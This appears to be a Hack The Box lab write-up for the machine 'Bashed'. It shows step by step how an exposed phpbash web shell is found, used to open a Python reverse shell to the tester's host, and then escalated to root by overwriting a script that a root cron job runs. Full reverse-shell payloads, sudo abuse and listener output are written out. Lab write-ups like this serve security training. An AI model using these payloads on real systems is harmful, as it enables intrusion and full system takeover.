HTB: Bashed
Bashed
Next after Netmon is Bashed; I don’t know anything about it. I do wonder if it’s shellshock though, just based on the name.
Ports
HTTP only. Makes it easy, no?
HTTP
On the webpage we get some information about something called phpbash, and there is a link to a Github repo where we can inspect the code. Essentially it takes POST requests and runs them as shell_exec. We need to find it on the website; a quick run with dirsearch turns up /dev and we can find what we’re after.
http://10.10.10.68/dev/phpbash.php
We can send it commands; I use Burp Repeater to get myself a reverse shell:
POST /dev/phpbash.php?cmd=id HTTP/1.1
Host: 10.10.10.68
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 252
Origin: http://10.10.10.68
Connection: close
Referer: http://10.10.10.68/dev/phpbash.php?cmd=id
cmd=cd /var/www/html/dev; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.9",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'On the box
I check sudo -l and find I can do whatever I want as scriptmanager; so I become scriptmanager.
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.68] 40400
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@bashed:/var/www/html/dev$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/var/www/html/dev$ cd ~
cd ~
scriptmanager@bashed:~$ pwd
pwd
/home/scriptmanagerThat’s all well and good, but I need to know what scriptmanager has access to. I search for files:
scriptmanager@bashed:/$ find . -user scriptmanager 2>/dev/null
find . -user scriptmanager 2>/dev/null
./scripts
./scripts/test.py
./home/scriptmanager
./home/scriptmanager/.profile
./home/scriptmanager/.bashrc
./home/scriptmanager/.nano
./home/scriptmanager/.bash_history
./home/scriptmanager/.bash_logout
# etc, including about a million /procRight; what’s test.py?
scriptmanager@bashed:/scripts$ ls -lash
ls -lash
total 16K
4.0K drwxrwxr-- 2 scriptmanager scriptmanager 4.0K Dec 4 2017 .
4.0K drwxr-xr-x 23 root root 4.0K Dec 4 2017 ..
4.0K -rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
4.0K -rw-r--r-- 1 root root 12 Mar 7 00:22 test.txt
scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt
testing 123!scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$Two interesting things to note here. One, we own the python script. Two, root owns the output and it was created very recently. I check /etc/crontab but there is nothing interesting. I wait a minute or two, and a new copy of test.txt is created. So it is running as a root cron. That’s our in:
scriptmanager@bashed:/scripts$ rm test.py
rm test.py
scriptmanager@bashed:/scripts$ printf 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.9",1235));os.dup2(s.fileno(),; os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\n' >> test.py
<no(),2);p=subprocess.call(["/bin/sh","-i"]);\n' >> test.py
scriptmanager@bashed:/scripts$We don’t have to wait long:
┌──(root💀kali)-[/opt/htb/bashed]
└─# nc -nvlp 1235 1
listening on [any] 1235 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.68] 36520
/bin/sh: 0: cant access tty; job control turned off
# id;hostname
uid=0(root) gid=0(root) groups=0(root)
bashed
# cd /root
# ls -lash
total 32K
4.0K drwx------ 3 root root 4.0K Dec 4 2017 .
4.0K drwxr-xr-x 23 root root 4.0K Dec 4 2017 ..
4.0K -rw------- 1 root root 1 Dec 23 2017 .bash_history
4.0K -rw-r--r-- 1 root root 3.1K Dec 4 2017 .bashrc
4.0K drwxr-xr-x 2 root root 4.0K Dec 4 2017 .nano
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -r-------- 1 root root 33 Dec 4 2017 root.txt
4.0K -rw-r--r-- 1 root root 66 Dec 4 2017 .selected_editor
# cat root.txt
flag goes herePretty simple. Strictly speaking Traceback would be next but I’ve done that, so Nibbles it is.